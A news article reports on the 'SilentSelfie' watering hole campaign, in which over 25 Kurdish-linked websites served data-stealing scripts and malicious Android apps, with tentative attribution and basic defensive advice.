Websites Targeted in Watering Hole Attack Distributing Spyware

Over 25 websites tied to the Kurdish community have fallen victim to a watering hole attack, which has been active for more than a year and a half, aimed at gathering sensitive data. The campaign, called “SilentSelfie,” was first detected in December 2022 and continues to operate, according to a recent report.

The compromised sites, which include Kurdish media outlets, the Rojava administration, armed forces, and organizations across Türkiye and Kurdish regions, were infected with malicious scripts that deployed four different versions of an information-stealing framework. The simplest of these variants only gathered basic user location data, while the more advanced strains could access the user’s selfie camera and prompt the installation of malicious Android APK files.

The exact method of compromise for these websites remains unclear, but security experts believe this attack represents a new, unidentified threat group. Previously, Kurdish communities have been targeted by threat actors like StrongPity and BladeHawk. A similar attack, revealed earlier in the year, involved Kurdish sites in the Netherlands, attributed to a Türkiye-linked group known as Sea Turtle.

The malicious scripts used in this attack are capable of collecting a wide range of visitor data, including device specifications, battery status, browser language, location, and public IP address. In some cases, the scripts redirect users to infected Android applications. For example, one Android app linked to the attacks embeds the compromised website into a WebView, allowing it to secretly gather information such as contact lists, files stored in external storage, and the user’s location, depending on the permissions granted.

Although the attack lacks a persistence mechanism, it activates as soon as the targeted user opens the malicious RojNews app. Ten seconds after launch, the app’s “LocationHelper” service begins sending the user’s location data to a hidden URL and awaits further commands.

Researchers have not been able to definitively identify the group behind SilentSelfie, but some speculate that it could be linked to the Kurdistan Regional Government of Iraq. This theory stems from the arrest of RojNews journalist Silêman Ehmed by local forces, followed by his imprisonment in 2024.

Though not technically sophisticated, the SilentSelfie campaign is notable for its extended duration and the number of Kurdish sites it has compromised. It appears to be the work of a relatively inexperienced or newly emerged threat actor with limited technical capabilities.

To reduce the risk of falling victim to watering hole attacks like SilentSelfie, users and organizations should ensure their systems and applications are up-to-date with security patches. Installing reliable anti-virus software, avoiding suspicious downloads, and being cautious of unfamiliar APKs are also key preventive measures.